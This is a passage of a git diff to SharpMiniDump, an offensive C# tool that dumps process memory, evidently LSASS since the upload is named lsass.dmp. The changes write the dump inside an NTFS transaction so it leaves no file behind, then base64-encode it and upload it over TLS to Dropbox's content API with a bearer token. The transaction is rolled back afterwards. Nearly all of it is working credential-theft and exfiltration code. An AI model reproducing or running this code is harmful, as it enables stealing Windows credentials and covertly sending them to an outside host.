DebugControl; - public ulong LastBranchToRip; - public ulong LastBranchFromRip; - public ulong LastExceptionToRip; - public ulong LastExceptionFromRip; - } - - - public static IntPtr OpenProcess(ProcessAccessFlags processAccess, bool bInheritHandle, int processId) - { - Natives.CLIENT_ID clientid = new Natives.CLIENT_ID(); - clientid.UniqueProcess = (IntPtr)processId; - clientid.UniqueThread = IntPtr.Zero; - - IntPtr hProcess = IntPtr.Zero; - - Natives.OBJECT_ATTRIBUTES objAttribute = new Natives.OBJECT_ATTRIBUTES(); - - NTSTATUS res = NativeSysCall.ZwOpenProcess10(ref hProcess, processAccess, objAttribute, ref clientid); - - return hProcess; - } - + private static IntPtr GetNtDll() { return LoadLibrary("ntdll.dll"); } - - + public static int NtFilterToken(IntPtr TokenHandle, uint Flags, IntPtr SidsToDisable, IntPtr PrivilegesToDelete, IntPtr RestrictedSids, ref IntPtr hToken) { IntPtr proc = GetProcAddress(GetNtDll(), "NtFilterToken"); @@ -1357,56 +555,14 @@ private static IntPtr GetDbgcore() return LoadLibrary("dbgcore.dll"); } - - public static IntPtr GetCurrentProcess() - { - IntPtr proc = GetProcAddress(GetKernel32(), "GetCurrentProcess"); - NativeSysCall.Delegates.GetCurrentProcess GetCurrentProcess = (NativeSysCall.Delegates.GetCurrentProcess)Marshal.GetDelegateForFunctionPointer(proc, typeof(NativeSysCall.Delegates.GetCurrentProcess)); - return GetCurrentProcess(); - } - - public static bool CloseHandle(IntPtr handle) - { - IntPtr proc = GetProcAddress(GetKernel32(), "CloseHandle"); - NativeSysCall.Delegates.CloseHandle CloseHandle = (NativeSysCall.Delegates.CloseHandle)Marshal.GetDelegateForFunctionPointer(proc, typeof(NativeSysCall.Delegates.CloseHandle)); - return CloseHandle(handle); - } - - public static bool UpdateProcThreadAttribute(IntPtr lpAttributeList, uint dwFlags, IntPtr Attribute, IntPtr lpValue, IntPtr cbSize, IntPtr lpPreviousValue, IntPtr lpReturnSize) - { - IntPtr proc = GetProcAddress(GetKernelbase(), "UpdateProcThreadAttribute"); - NativeSysCall.Delegates.UpdateProcThreadAttribute UpdateProcThreadAttribute = (NativeSysCall.Delegates.UpdateProcThreadAttribute)Marshal.GetDelegateForFunctionPointer(proc, typeof(NativeSysCall.Delegates.UpdateProcThreadAttribute)); - return UpdateProcThreadAttribute(lpAttributeList, dwFlags, Attribute, lpValue, cbSize, lpPreviousValue, lpReturnSize); - } - - public static bool InitializeProcThreadAttributeList(IntPtr lpAttributeList, int dwAttributeCount, int dwFlags, ref IntPtr lpSize) - { - IntPtr proc = GetProcAddress(GetKernelbase(), "InitializeProcThreadAttributeList"); - NativeSysCall.Delegates.InitializeProcThreadAttributeList InitializeProcThreadAttributeList = (NativeSysCall.Delegates.InitializeProcThreadAttributeList)Marshal.GetDelegateForFunctionPointer(proc, typeof(NativeSysCall.Delegates.InitializeProcThreadAttributeList)); - return InitializeProcThreadAttributeList(lpAttributeList, dwAttributeCount, dwFlags, ref lpSize); - } - + public static bool RtlGetVersion(ref OSVERSIONINFOEXW lpVersionInformation) { IntPtr proc = GetProcAddress(GetNtDll(), "RtlGetVersion"); NativeSysCall.Delegates.RtlGetVersion RtlGetVersion = (NativeSysCall.Delegates.RtlGetVersion)Marshal.GetDelegateForFunctionPointer(proc, typeof(NativeSysCall.Delegates.RtlGetVersion)); return RtlGetVersion(ref lpVersionInformation); } - - public static bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect) - { - IntPtr proc = GetProcAddress(GetKernelbase(), "VirtualProtect"); - NativeSysCall.Delegates.VirtualProtect VirtualProtect = (NativeSysCall.Delegates.VirtualProtect)Marshal.GetDelegateForFunctionPointer(proc, typeof(NativeSysCall.Delegates.VirtualProtect)); - return VirtualProtect(lpAddress, dwSize, flNewProtect, out lpflOldProtect); - } - - public static bool VirtualProtectEx(IntPtr hProcess, IntPtr lpAddress, IntPtr dwSize, uint newprotect, out uint oldprotect) - { - IntPtr proc = GetProcAddress(GetKernelbase(), "VirtualProtectEx"); - NativeSysCall.Delegates.VirtualProtectEx VirtualProtectEx = (NativeSysCall.Delegates.VirtualProtectEx)Marshal.GetDelegateForFunctionPointer(proc, typeof(NativeSysCall.Delegates.VirtualProtectEx)); - return VirtualProtectEx(hProcess, lpAddress, dwSize, newprotect, out oldprotect); - } - + public static UInt32 LdrLoadDll(IntPtr PathToFile, UInt32 dwFlags, ref Natives.UNICODE_STRING ModuleFileName, ref IntPtr ModuleHandle) { IntPtr proc = GetProcAddress(GetNtDll(), "LdrLoadDll"); @@ -1435,7 +591,7 @@ public static bool OpenProcessToken(IntPtr hProcess, UInt32 dwDesiredAccess, out return OpenProcessToken( hProcess, dwDesiredAccess, out hToken); } - public static bool MiniDumpWriteDump(IntPtr hProcess, uint ProcessId, Microsoft.Win32.SafeHandles.SafeFileHandle hFile, int DumpType, IntPtr ExceptionParam, IntPtr UserStreamParam, IntPtr CallbackParam) + public static bool MiniDumpWriteDump(IntPtr hProcess, uint ProcessId, IntPtr hFile, int DumpType, IntPtr ExceptionParam, IntPtr UserStreamParam, IntPtr CallbackParam) { IntPtr proc = GetProcAddress(GetDbgcore(), "MiniDumpWriteDump"); NativeSysCall.Delegates.MiniDumpWriteDump MiniDumpWriteDump = (NativeSysCall.Delegates.MiniDumpWriteDump)Marshal.GetDelegateForFunctionPointer(proc, typeof(NativeSysCall.Delegates.MiniDumpWriteDump)); @@ -1467,8 +623,7 @@ public static IntPtr GetProcAddress(IntPtr hModule, string procName) { return CustomLoadLibrary.GetExportAddress(hModule, procName); } - - + public static IntPtr LoadLibrary(string name) { return CustomLoadLibrary.GetDllAddress(name, true); diff --git a/SharpMiniDump/Program.cs b/SharpMiniDump/Program.cs index 163ca1c..748cff5 100644 --- a/SharpMiniDump/Program.cs +++ b/SharpMiniDump/Program.cs @@ -1,27 +1,34 @@ -// -// Author: B4rtik (@b4rtik) -// Project: SharpMiniDump (https://github.com/b4rtik/SharpMiniDump) -// License: BSD 3-Clause -// - -using System; +using System; using System.ComponentModel; using System.Diagnostics; -using System.IO; using System.Runtime.InteropServices; -using System.Threading; namespace SharpMiniDump { - public class Program { + + [DllImport("ntdll.dll")] + public static extern bool RtlSetCurrentTransaction(IntPtr TransactionHandle); + + [DllImport("ntdll.dll")] + public static extern int NtRollbackTransaction(IntPtr TransactionHandle, bool Wait); + + [DllImport("kernel32.dll")] + public static extern int GetFileSize(IntPtr FileHandle, IntPtr Test); + + [DllImport("kernel32.dll", SetLastError = true)] + public static extern IntPtr CreateFileMapping(IntPtr hFile, int lpAttributes, uint flProtect, uint dwMaximumSizeHigh, uint dwMaximumSizeLow, string lpName); + + [DllImport("kernel32.dll", SetLastError = true)] + internal static extern IntPtr MapViewOfFile(IntPtr hFileMappingObject, int dwDesiredAccess, uint dwFileOffsetHigh, uint dwFileOffsetLow, uint dwNumberOfBytesToMap); + static void Main(string[] args) { Execute(args); } - public static void Execute(string[] args) + public unsafe static void Execute(string[] args) { if (IntPtr.Size != 8) { @@ -82,7 +89,7 @@ public static void Execute(string[] args) return; } - Console.WriteLine("[*] ZwOpenProcess10 " + status); + Console.WriteLine("[*] ZwOpenProcess10: " + status); Natives.PSS_CAPTURE_FLAGS flags = Natives.PSS_CAPTURE_FLAGS.PSS_CAPTURE_VA_CLONE | Natives.PSS_CAPTURE_FLAGS.PSS_CAPTURE_HANDLES @@ -107,10 +114,17 @@ public static void Execute(string[] args) return; } + IntPtr tHandle = IntPtr.Zero; + + status = NativeSysCall.NtCreateTransaction10(out tHandle, Natives.MAXIMUM_ALLOWED, IntPtr.Zero, IntPtr.Zero, IntPtr.Zero, 0, 0, 0, IntPtr.Zero, IntPtr.Zero); + Console.WriteLine("[*] Transaction: " + status); + + bool success = RtlSetCurrentTransaction(tHandle); + Natives.UNICODE_STRING uFileName = new Natives.UNICODE_STRING(); Natives.RtlInitUnicodeString(ref uFileName, @"\??\C:\Windows\Temp\dumpert.dmp"); - Microsoft.Win32.SafeHandles.SafeFileHandle hDmpFile; + IntPtr hDmpFile; IntPtr hElm = IntPtr.Zero; Natives.IO_STATUS_BLOCK IoStatusBlock = new Natives.IO_STATUS_BLOCK(); @@ -133,9 +147,11 @@ public static void Execute(string[] args) long allocationsize = 0; + const long READWRITE = Natives.FILE_GENERIC_READ | Natives.FILE_GENERIC_WRITE; + status = NativeSysCall.NtCreateFile10( out hDmpFile, - (int)Natives.FILE_GENERIC_WRITE, + (int)READWRITE, ref FileObjectAttributes, out IoStatusBlock, ref allocationsize, @@ -144,15 +160,9 @@ public static void Execute(string[] args) Natives.FILE_OVERWRITE_IF, Natives.FILE_SYNCHRONOUS_IO_NONALERT, hElm, 0); - - if (hDmpFile.IsInvalid) - { - Console.WriteLine("[x] Error NtCreateFile10 " + status + " " + IoStatusBlock.status); - NativeSysCall.ZwClose10(hProcess); - return; - } - + success = RtlSetCurrentTransaction(IntPtr.Zero); + Natives.MINIDUMP_CALLBACK_INFORMATION CallbackInfo = new Natives.MINIDUMP_CALLBACK_INFORMATION(); CallbackInfo.CallbackRoutine = Program.MyMiniDumpWriteDumpCallback; CallbackInfo.CallbackParam = IntPtr.Zero; @@ -165,7 +175,7 @@ public static void Execute(string[] args) IntPtr CallbackParam = IntPtr.Zero; Console.WriteLine("[*] Target PID " + pWinVerInfo.hTargetPID); - Console.WriteLine("[*] Generating minidump.... " + pWinVerInfo.hTargetPID); + Console.WriteLine("[*] Generating minidump.... "); if (!Natives.MiniDumpWriteDump(SnapshotHandle, (uint)pWinVerInfo.hTargetPID, hDmpFile, 2, ExceptionParam, UserStreamParam, pCallbackInfo)) { @@ -174,11 +184,29 @@ public static void Execute(string[] args) return; } - hDmpFile.Dispose(); + int size = GetFileSize(hDmpFile, IntPtr.Zero); + + IntPtr hMapping = CreateFileMapping(hDmpFile, 0, (uint)Natives.PROTECT.PAGE_READONLY, 0, 0, ""); + + IntPtr data = MapViewOfFile(hMapping, Natives.FILE_MAP_READ, 0, 0, 0); + Console.WriteLine("[*] Data: 0x" + Convert.ToString((long)data, 16)); + + byte[] data_ = new byte[size]; + Marshal.Copy(data, data_, 0, size); + + string b64 = Convert.ToBase64String(data_); + + Console.WriteLine("[*] Sending " + b64.Length/(1024*1024) + " megabytes of data..."); + + SslTcpClient.RunClient("content.dropboxapi.com", "", "", b64); + + int stat = NtRollbackTransaction(tHandle, false); + + NativeSysCall.ZwClose10(hDmpFile); NativeSysCall.ZwClose10(hProcess); + NativeSysCall.ZwClose10(tHandle); - Console.WriteLine("[*] End "); - Console.WriteLine("[*] Minidump generated in " + Marshal.PtrToStringUni(uFileName.Buffer).Substring(4)); + Console.WriteLine("[*] Done! "); } private static bool UnHookNativeApi(Natives.WIN_VER_INFO pWinVerInfo) @@ -267,7 +295,6 @@ out returnLength } else { - return false; } } diff --git a/SharpMiniDump/SharpMiniDump.csproj b/SharpMiniDump/SharpMiniDump.csproj index 6a98c5f..7804724 100644 --- a/SharpMiniDump/SharpMiniDump.csproj +++ b/SharpMiniDump/SharpMiniDump.csproj @@ -66,10 +66,12 @@ + + \ No newline at end of file diff --git a/SharpMiniDump/SslTcpClient.cs b/SharpMiniDump/SslTcpClient.cs new file mode 100644 index 0000000..6902010 --- /dev/null +++ b/SharpMiniDump/SslTcpClient.cs @@ -0,0 +1,51 @@ +using System.Net; +using System.Net.Security; +using System.Net.Sockets; +using System.Security.Authentication; +using System.Security.Cryptography.X509Certificates; +using System.Text; + +namespace SharpMiniDump +{ + public class SslTcpClient + { + public static string old = null; + + public static bool ValidateServerCertificate(object sender, X509Certificate certificate, X509Chain chain, SslPolicyErrors sslPolicyErrors) + { + if (sslPolicyErrors == SslPolicyErrors.None) + { + return true; + } + return false; + } + + public static void RunClient(string machineName, string project, string token, string content) + { + TcpClient client = new TcpClient(machineName, 443); + SslStream sslStream = new SslStream(client.GetStream(), false, new RemoteCertificateValidationCallback(ValidateServerCertificate), null); + try + { + const SslProtocols _Tls12 = (SslProtocols)3072; + const SecurityProtocolType Tls12 = (SecurityProtocolType)_Tls12; + ServicePointManager.SecurityProtocol = Tls12; + sslStream.AuthenticateAsClient(machineName, null, _Tls12, false); ; + } + catch (AuthenticationException e) + { + if (e.InnerException != null) + { } + client.Close(); + return; + } + + string headers = "POST /2/files/upload HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36\r\nHost: content.dropboxapi.com\r\nAuthorization: Bearer " + token + "\r\nDropbox-API-Arg: {\"path\": \"/" + project + "/lsass.dmp\",\"mode\": \"overwrite\",\"autorename\": false,\"mute\": false,\"strict_conflict\": false}\r\nContent-Type: text/plain; charset=dropbox-cors-hack\r\n"; + string length = "Content-Length: " + Encoding.UTF8.GetByteCount(content).ToString() + "\r\n\r\n"; + byte[] messsage = Encoding.UTF8.GetBytes(headers + length + content); + sslStream.Write(messsage, 0, messsage.Length); + sslStream.Flush(); + + System.Threading.Thread.Sleep(5000); + } + } +} \ No newline at end of file